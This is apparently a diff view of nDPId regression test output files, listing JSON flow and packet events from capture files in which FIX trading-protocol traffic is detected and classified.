00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"}
00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="}
00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"}
00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1261,"packets-processed":1261,"total-skipped-flows":0,"total-l4-data-len":37586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":75,"global_ts_msec":1493755132120}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 1261/1261

24
test/results/fix2.pcap.out
View File

@@ -1,17 +1,17 @@
00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fix2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fix2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614758889587}
00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889588,"flow_last_seen":1614758889588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889588,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614758889588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889588,"pkt":"5kBKB+riApXG95NLCABFAAAweTwAAIAGAAAKZQACCmYAAoiSBAAt1D8pAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAweT0AAIAGAAAKZQACCmYACYiTBAAt1EIqAAAAAHACgAEU+AAAAgQFtAMDAQA="}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT4AAIAGrLsKZgACCmUAAgQAiJIt1EL8LdQ\/KnASgAGE3gAAAgQFtAMDAQA="}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeT4AAIAGAAAKZQACCmYAAoiSBAAt1D8qLdRC\/VAQgAEU6QAAAAAAAAAA"}
00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT8AAIAGrLMKZgAJCmUAAgQAiJMt1EWWLdRCK3ASgAF\/OwAAAgQFtAMDAQA="}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeUAAAIAGAAAKZQACCmYACYiTBAAt1EIrLdRFl1AQgAEU8AAAAAAAAAAA"}
00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889588,"flow_last_seen":1614758889588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889588,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
